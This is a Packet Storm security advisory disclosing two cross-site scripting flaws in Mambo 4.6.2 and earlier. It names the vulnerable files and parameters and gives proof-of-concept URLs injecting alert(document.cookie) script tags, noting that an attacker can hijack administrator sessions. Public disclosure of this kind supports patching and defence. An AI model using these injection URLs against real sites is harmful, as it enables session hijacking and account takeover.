exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mambo462-morexss.txt

mambo462-morexss.txt
Posted Aug 16, 2008
Authored by IRCRASH | Site ircrash.com

Mambo versions 4.6.2 and below appear susceptible to more cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | f7e6879744083fa2020edf3ac311b6c0cc6a327d4062bb79b377d2ecb04dde87

mambo462-morexss.txt

Change Mirror Download
----------------------------------------------------------------

Script : Mambo 4.6.2 Full & Older Versions

Type : Multiple Cross Site Scripting Vulnerabilities

Alert Level : Medium

----------------------------------------------------------------

Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability 1 :

Vulnerable File : administrator/popups/index3pop.php

Vulnerable Line (5) : <title><?php echo $mosConfig_sitename; ?> - Administration [Mambo]</title>

Vulnerable Variable : mosConfig_sitename

For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>

Attacker can hijack administrator cookie and session and login with they

----------------------------------------------------------------

Cross Site Scripting Vulnerability 2 :

Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?

Vulnable Variable : Any Variable - You can set any variable ....

For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=<script>alert('xss')</script>

you can set cross site scripting code in variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?<script>alert('xss')</script>=Hello+Word

----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close